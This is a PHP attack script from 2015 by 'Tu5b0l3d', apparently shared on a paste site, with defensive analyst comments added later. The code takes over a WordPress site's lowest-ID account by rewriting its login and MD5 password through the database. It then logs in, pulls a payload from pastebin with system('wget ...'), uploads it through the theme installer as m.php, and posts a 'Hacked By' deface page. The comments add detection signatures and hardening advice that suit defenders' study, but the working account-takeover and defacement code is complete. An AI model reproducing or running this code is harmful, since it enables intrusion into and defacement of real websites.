Tu5b0l3d

wp2.php

Oct 15th, 2015
<?php
//Tu5b0l3d
//IndoXPloit, HNc
//http://indoxploit.blogspot.co.id/2015/10/auto-edit-user-and-deface-in-wordpress.html
//
// Analyst annotation (comments only; the code is unchanged).
// What the script does, as written:
//   1. Takes MySQL connection details and a WordPress table prefix from a web form.
//   2. Overwrites user_login and user_pass on the lowest-ID row of the users table.
//   3. When the "tanya" field is "y", logs in with the new credentials and tries
//      to push a PHP file through the theme uploader (second stage, further down).
// It can do nothing without valid database credentials, so it is a post-compromise
// tool; how the operator obtained those credentials is not shown on this page.
// Finding this file on a server should be treated as evidence of an intrusion.
// Relevant hardening: a least-privilege database account that is not reachable
// from other hosts, and alerting on changes to the users table.

    if($_POST){
        // Every value below comes straight from the request; nothing is validated.
        $host = $_POST['host'];
        $username = $_POST['username'];
        $password = $_POST['password'];
        $db = $_POST['db'];
        $dbprefix = $_POST['dbprefix'];
        $user_baru = $_POST['user_baru'];
        $password_baru = $_POST['password_baru'];
        // Fully qualified table names: <db>.<prefix>users and <db>.<prefix>options.
        $prefix = $db.".".$dbprefix."users";
        $sue = $db.".".$dbprefix."options";
         $tanya = $_POST['tanya'];
         // The form at the bottom has no "target" field; this value is replaced
         // below by a row read from the options table.
         $target = $_POST['target'];
         $nick = $_POST['nick'];
        // Unsalted MD5 of the new password.
        // NOTE(review): WordPress is known to accept legacy MD5 values in user_pass
        // and rehash them at login - a bare 32-hex-character user_pass on an
        // established account is worth flagging in an audit; confirm per version.
        $pass = md5("$password_baru");


        // ext/mysql API (removed in PHP 7.0), so this only runs on older PHP builds.
        mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");
        mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");

        // First row ordered by ID, i.e. the lowest user ID (presumably the original
        // administrator account - confirm per site).
        $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
        $r=mysql_fetch_array($tampil);
        // Bare-word array key; legacy PHP falls back to the string 'ID'.
        $id = $r[ID];

        // First row of the options table, used from here on as the site base URL.
        // NOTE(review): on a stock install the lowest option_id is usually siteurl;
        // the script appears to rely on that - confirm against the target schema.
        $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
        $r2=mysql_fetch_array($tampil2);
        $target = $r2[option_value];


         // The account takeover itself: login name and password hash of that user
         // are replaced in a single statement built by string interpolation.
         // Detection: an unexpected user_login change on the lowest ID, or a first
         // login by a user name that did not exist before.
         mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");




            // Optional second stage, selected with the "Auto Deface" radio button.
            if($tanya=="y"){

    // Returns the text between the first occurrence of $kata1 and the next
    // occurrence of $kata2 after it, or FALSE when either marker is missing
    // from $param. The script uses it to pull the _wpnonce value out of the
    // HTML of a WordPress admin form.
    // Note: when $kata2 only occurs before $kata1, the second strpos() returns
    // FALSE and the substr() length becomes negative, so the result is not a
    // clean extract in that case.
    function ambilKata($param, $kata1, $kata2){
    if(strpos($param, $kata1) === FALSE) return FALSE;
    if(strpos($param, $kata2) === FALSE) return FALSE;
    // Offset just past the opening marker.
    $start = strpos($param, $kata1) + strlen($kata1);
    // Closing marker is searched for from that offset onwards.
    $end = strpos($param, $kata2, $start);
    $return = substr($param, $start, $end - $start);
    return $return;
}

    // Fetches $sites with cURL and returns the response body (curl_exec() returns
    // FALSE on failure). Not called anywhere in the visible script.
    // Certificate and host-name verification are both switched off, and cookies
    // are read from and written to a file named coker_log in the working
    // directory. The handle is never closed.
    function anucurl($sites){
        $ch1 = curl_init ("$sites");
curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
// Fixed user-agent string, identical in every request this script makes.
curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
// TLS peer and host verification disabled.
curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
// Session cookies persist in ./coker_log - a file-system artefact to look for.
curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
$data = curl_exec ($ch1);
return $data;
    }

    // Posts the WordPress login form fields to $cek and returns the response body
    // (curl_exec() returns FALSE on failure).
    //   $cek   - URL the form is posted to
    //   $web   - site base URL, used only to build redirect_to
    //   $userr - login name
    //   $pass  - plain-text password
    // The session cookie is kept in ./coker_log so later requests reuse the login.
    // Detection: the request pairs the fixed Firefox/32.0 user-agent string below
    // with rememberme=forever and testcookie=1; TLS verification is disabled.
    function lohgin($cek, $web, $userr, $pass){
        $post = array(
                    "log" => "$userr",
                    "pwd" => "$pass",
                    "rememberme" => "forever",
                    "wp-submit" => "Log In",
                    "redirect_to" => "$web/wp-admin/",
                    "testcookie" => "1",
                    );
$ch = curl_init ("$cek");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
// TLS peer and host verification disabled.
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
// Cookie jar shared with the other requests in this script.
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$data6 = curl_exec ($ch);
return $data6;
    }

// Second stage, part 1: log in with the credentials just written to the database
// and submit a file through the theme uploader.
// Request sequence visible in access logs, all with the same fixed user agent:
//   POST /wp-login.php
//   POST /wp-admin/theme-install.php?upload
//   POST /wp-admin/update.php?action=upload-theme
$site= "$target/wp-login.php";
$site2= "$target/wp-admin/theme-install.php?upload";
// Result of the first login is never read; the call only fills the cookie jar.
$a = lohgin($site, $target, $user_baru, $password_baru);
// Same login fields posted to the theme-upload page; the response is used only
// to scrape the form's _wpnonce value.
$b = lohgin($site2, $target, $user_baru, $password_baru);


// PHP function names are case-insensitive, so this resolves to ambilKata().
$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
// Scraped value is echoed into the page without HTML escaping.
echo "# token -> $anu2<br>";


 // Fetches a second-stage file from a paste site via the shell and copies it to
 // m.php in the working directory. The content behind that paste ID is not part
 // of this page, so what m.php does cannot be determined here.
 // Detection: the web-server user spawning wget/cp, outbound requests from the
 // web server to a paste site, and the files "raw.php?i=mEQP6prW" and m.php
 // appearing next to this script.
 // Mitigation: list system() in php.ini disable_functions and restrict outbound
 // traffic from web servers.
 system('wget http://pastebin.com/raw.php?i=mEQP6prW');
 system('cp raw.php?i=mEQP6prW m.php');

  // Theme-upload form fields; the "@" prefix is the legacy cURL file-upload form.
  $post2 = array(
                    "_wpnonce" => "$anu2",
                    "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
                    "themezip" => "@m.php",
                    "install-theme-submit" => "Install Now",
                    );
// Mitigation: defining DISALLOW_FILE_MODS in wp-config.php disables theme and
// plugin installation from the dashboard, which is the path abused here.
$ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
// Response is stored but never inspected; the handle is not closed.
$data3 = curl_exec ($ch);

// Second stage, part 2: write the operator-supplied "nick" text to wew.php in the
// working directory. The file handle is never closed.
$namafile = "wew.php";
$fp2 = fopen($namafile,"w");
fputs($fp2,$nick);

// Current year and month, matching WordPress's year/month uploads folders.
$y = date("Y");
$m = date("m");


// Posts wew.php as form field "file3" to m.php under wp-content/uploads/<Y>/<m>/.
// NOTE(review): this implies the operator expects the file submitted through the
// theme uploader to remain reachable in the uploads folder - confirm against the
// WordPress version in question.
// Detection: any .php file under wp-content/uploads, and POST requests to such a
// path. Mitigation: deny script execution in the uploads directory at the
// web-server level.
$ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
curl_setopt($ch6, CURLOPT_POST, true);
curl_setopt($ch6, CURLOPT_POSTFIELDS,
array('file3'=>"@$namafile"));
curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
$postResult = curl_exec($ch6);
curl_close($ch6);

// Success check: fetch k.php from the site root and look for the word "hacked"
// (case-insensitive). Nothing in the visible code creates k.php; presumably the
// downloaded m.php does - that cannot be confirmed from this page.
// Detection: an unexpected k.php in the web root.
$as = "$target/k.php";
$bs = file_get_contents($as);
 if(preg_match("#hacked#si",$bs)){
                        echo "# <font color='green'>berhasil mepes...</font><br>";
                        echo "# $target/k.php<br>";
                    }
                    else{
                        // Failure path: the new login name and plain-text password
                        // are printed into the response without HTML escaping.
                        echo "# <font color='red'>gagal mepes...</font><br>";
                        echo "# coba aja manual: <br>";
                        echo "# $target/wp-login.php<br>";
                        echo "# username: $user_baru<br>";
                        echo "# password: $password_baru<br>";


                    }




        }

        elseif($tanya=="n"){
            // Credential change only: report the new login name and plain-text
            // password back to the operator, unescaped.
            echo "# Sukses<br>";
            echo "# username: $user_baru<br>";
            echo "# password: $password_baru<br>";
        }



    }else{
            // No POST data: render the operator form. The script has no
            // authentication of its own, so anyone who can reach it can use it.
            // The fixed strings "Wordpress Created New User" and
            // "Hacked By Tu5b0l3d" are usable as content signatures when sweeping
            // a web root for this file.
            echo '<html>
    <head>
        <title>Wordpress Created New User</title>
    </head>

    <body>
            <center>
                <center><div id="button"></div>
                        <h2>Wordpress Created New User</h2>
                        <table>
                            <tr><td><form method="post" action="?action"></td></tr>
                            <tr><td><input type="text" name="host" placeholder="localhost"></td></tr>
                            <tr><td><input type="text" name="username" placeholder="User DB"></td></tr>
                            <tr><td><input type="text" name="password" placeholder="Password DB"></td></tr>
                            <tr><td><input type="text" name="db" placeholder="Database"></td></tr>
                            <tr><td><input type="text" name="dbprefix" placeholder="dbprefix"></td></tr>
                            <tr><td><input type="text" name="user_baru" placeholder="Username Baru"></td></tr>
                            <tr><td><input type="text" name="password_baru" placeholder="Password Baru"></td></tr>
                              <tr><td> Auto Deface <input type="radio" name="tanya" value="y"> y <input type="radio" name="tanya" value="n"> n</td></tr>

                            <tr><td><input type="text" name="nick" placeholder="Hacked By Tu5b0l3d"></td></tr>
                            <tr><td><input type="submit" value="Ganti"></td></tr>
                        </table>
                        *nb: kalo milih y ... silahkan Ganti Form Hacked By Tu5b0l3d jadi Hacked by Nick_ente
            </center>
    </body>';
        }

?>